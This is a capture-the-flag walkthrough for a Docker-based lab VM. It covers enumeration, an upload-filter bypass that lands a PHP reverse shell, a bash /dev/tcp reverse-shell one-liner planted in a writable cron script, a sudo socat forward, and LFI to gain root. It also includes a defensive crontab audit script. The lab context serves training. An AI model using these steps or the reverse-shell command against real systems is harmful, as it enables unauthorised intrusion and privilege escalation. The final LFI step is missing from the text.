Dev-container CTF is categorized as an easy-intermediate VM. It is based on containers, so if you have enough knowledge about Docker/containers then it will be an easy one for you.
So let's start with enumeration:
nmap -sC -A -T5 <IP>

Only one port is open (HTTP). After opening it I saw a Bootstrap website.

Let's fire up gobuster to check for hidden directories.
gobuster dir -u http://<IP> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Found an interesting directory, /upload. After opening it I found that we can upload files in jpg, png, txt, gif, docs, zip formats.

So I modified a PHP script (change it to your Kali IP address and the port on which you want to listen), saved it with the name "shell.php.jpg" and started Burp Suite as well.
locate php-reverse-shell
It will give you the PHP shell; modify it!


After starting Burp Suite and clicking submit you will see a request. Now change the file name shell.php.jpg to shell.php and forward the request.

You will see that your file was submitted successfully. It's time to listen with netcat on the port you mentioned in the PHP code.

Great, we got a www-data shell. I checked almost every directory but didn't get anything useful, then I went to /var/www/html and found Maintenance-Web-Docker, and in it I found 3 files.

Here I saw the script list.sh, which is writable, and after opening it I found that it is a bash script that writes to out.txt. Let's check the out.txt file.

Okay, so we can see list.sh is running every minute. Now I just modified the list.sh file and put a reverse shell into it.

echo "bash -i >& /dev/tcp/<local_ip>/<LPORT> 0>&1" > list.sh
Now start listening with netcat and wait for a minute; you will get a shell.
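
On the defensive side, the weakness in this step is a script that runs on a schedule as one user (richard) while another user (www-data) can write to it. The following check is an added example, not part of the original writeup: it reads a crontab-format file and reports scheduled scripts that group or other users can modify. The crontab syntax, the function names and the sample files are assumptions, since the page does not show how list.sh is scheduled.

```sh
#!/bin/sh
# Added example, not from the writeup. Flags scheduled scripts that group or
# other users can modify. Assumes user-crontab syntax; the scheduler behind
# list.sh is not shown on the page.

# audit_cron_file FILE: prints "WRITABLE <perms> <path>" per risky script.
audit_cron_file() (
    cron_file=$1
    set -f                                  # cron lines contain '*': no globbing
    while IFS= read -r line; do
        set -- $line                        # split the entry into fields
        case ${1:-} in
            '#'*|[A-Za-z_]*) continue ;;    # comment or VAR=value line
            @*) shift ;;                    # @reboot-style entry: one field
            *) [ $# -ge 6 ] || continue     # blank or incomplete entry
               shift 5 ;;                   # drop the five schedule fields
        esac
        for word in "$@"; do
            case $word in /*) ;; *) continue ;; esac   # absolute paths only
            [ -f "$word" ] || continue
            # -L follows symlinks so /bin/sh -> dash is judged by its target.
            perms=$(ls -ldL "$word" | cut -c1-10)
            # Character 6 is group-write, character 9 is other-write.
            case $(printf '%s' "$perms" | cut -c6,9) in
                *w*) printf 'WRITABLE %s %s\n' "$perms" "$word" ;;
            esac
        done
    done < "$cron_file"
)

# Constructed sample data: a temp dir with a world-writable list.sh (standing
# in for the writable script above) next to a locked-down script, plus a
# crontab naming both.
demo() {
    d=$(mktemp -d)
    printf '#!/bin/sh\n' > "$d/list.sh";   chmod 777 "$d/list.sh"
    printf '#!/bin/sh\n' > "$d/backup.sh"; chmod 755 "$d/backup.sh"
    printf '* * * * * /bin/sh %s/list.sh\n0 3 * * * %s/backup.sh\n' \
        "$d" "$d" > "$d/crontab"
    audit_cron_file "$d/crontab"
    rm -rf "$d"
}
demo
```

Any line it prints names a script that should be owned by the account that runs it and have group and other write removed.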

Cool! We got richard's user shell and user.txt as well. It's time for root. Check:
sudo -l

We got a command that we can run with sudo -u root, but before that let's check what is in the HackTools directory. After opening it we find 2 files, README.txt and socat. Now just run the command that we found with sudo -l.
sudo -u root /home/richard/HackTools/socat TCP-LISTEN\:8080\,fork TCP\:127.0.0.1\:90

Just go to the browser and check <VM_ip:8080>; you will find a new page.

After going through ABOUT US and CONTACT I noticed that there may be an LFI, so I just checked for LFI.

Okay! I was correct. Now we can upload a PHP file again and get a root shell :)
I repeated the process that I used for getting the www-data shell. For convenience I just changed LPORT in the PHP code (I don't know why, but I did) and named the file shell1.php.jpg so that I could find it easily.
After uploading, go to the www-data shell and change directory to /var/www/html/upload/files and you will find your second PHP file there.
Just cp that file to /tmp/shell.php.

Now go to the browser again and write
and listen with netcat; you should get your root shell :)

*HAPPY HACKING*